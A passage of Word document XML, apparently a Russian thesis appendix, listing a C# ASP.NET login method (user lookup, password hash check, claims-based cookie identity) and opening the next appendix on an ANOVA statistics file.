      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve"> == </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>model.Name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34968143" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve"> (user == </w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE9B5B8" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CED072B"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2C38E6B9" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">                    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF8027A" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">                        Description = </w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t>Пользователь</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t>не</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t>найден</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E83CFCC" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">                    };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C797E8" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511B6E1B" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="245BDEF2" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>user.Password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve"> != </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>HashPassword.HashPassowrd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>model.Password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7384BB49" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4611C366"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3281FED7" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="003A41B1" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r w:rsidRPr="003A41B1">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401A4F54" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="003A41B1" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="003A41B1">
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r>
        <w:t>Description</w:t>
      </w:r>
      <w:r w:rsidRPr="003A41B1">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="003A41B1">
        <w:rPr>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00107CA1">
        <w:rPr>
          <w:color w:val="A31515"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Неверный</w:t>
      </w:r>
      <w:r w:rsidRPr="003A41B1">
        <w:rPr>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00107CA1">
        <w:rPr>
          <w:color w:val="A31515"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>пароль</w:t>
      </w:r>
      <w:r w:rsidRPr="003A41B1">
        <w:rPr>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00107CA1">
        <w:rPr>
          <w:color w:val="A31515"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>или</w:t>
      </w:r>
      <w:r w:rsidRPr="003A41B1">
        <w:rPr>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00107CA1">
        <w:rPr>
          <w:color w:val="A31515"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>логин</w:t>
      </w:r>
      <w:r w:rsidRPr="003A41B1">
        <w:rPr>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C621F75" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="003A41B1">
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5DB274" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0493FC03" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve"> result = Authenticate(user);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C37B9E9" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40E3E9AD"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02885703" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437EB44E" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    Data = result,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED7E03D"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OK</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6AC27513" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">                };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41124FEA" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7690A111" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>catch</w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve"> (Exception ex)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257FF9F2" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A47AA0" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">                _</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>logger.LogError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">(ex, </w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">$"[Login]: </w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:t>{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>ex.Message</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7601316D"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26D2129E" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64210027" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">                    Description = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>ex.Message</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610FC051"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InternalServerError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3451CFB3" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">                };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4199CB90" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44231C5E" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12041FD0" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="434523FD"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t>ClaimsIdentity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>Authenticate(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>User user)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8267F1" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDA69E1" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve"> claims = </w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve"> List&lt;Claim&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051CDB12" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0CFE9B" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>Claim(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>ClaimsIdentity.DefaultNameClaimType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>user.Name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70905B92" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>Claim(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>ClaimsIdentity.DefaultRoleClaimType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>user.Role.ToString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D15D304" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">            };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794D3EB4"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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>ClaimsIdentity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">claims, </w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t>ApplicationCookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236B8224" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ClaimsIdentity.DefaultNameClaimType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ClaimsIdentity.DefaultRoleClaimType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6C7791" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5233E35F" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA68A5B" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F168C8B" w14:textId="2BDD8C48" w:rsidR="00CC2EBA" w:rsidRPr="00BD5112" w:rsidRDefault="00CC2EBA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD5112">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F489F5A" w14:textId="05264A9A" w:rsidR="00CC2EBA" w:rsidRPr="00BD5112" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc162709250"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ПРИЛОЖЕНИЕ</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5112">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Г</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5112">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t>Содержимое</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5112">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>файла</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5112">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>работы</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5112">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>дисперсионного</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5112">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>анализа</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5112">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Anova</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5112">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD5112">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w14:paraId="76C42C11" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>System.Collections</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDB6F33" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2345EE71" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">namespace </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>ServerMVC.Infrastructure.Statistics</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
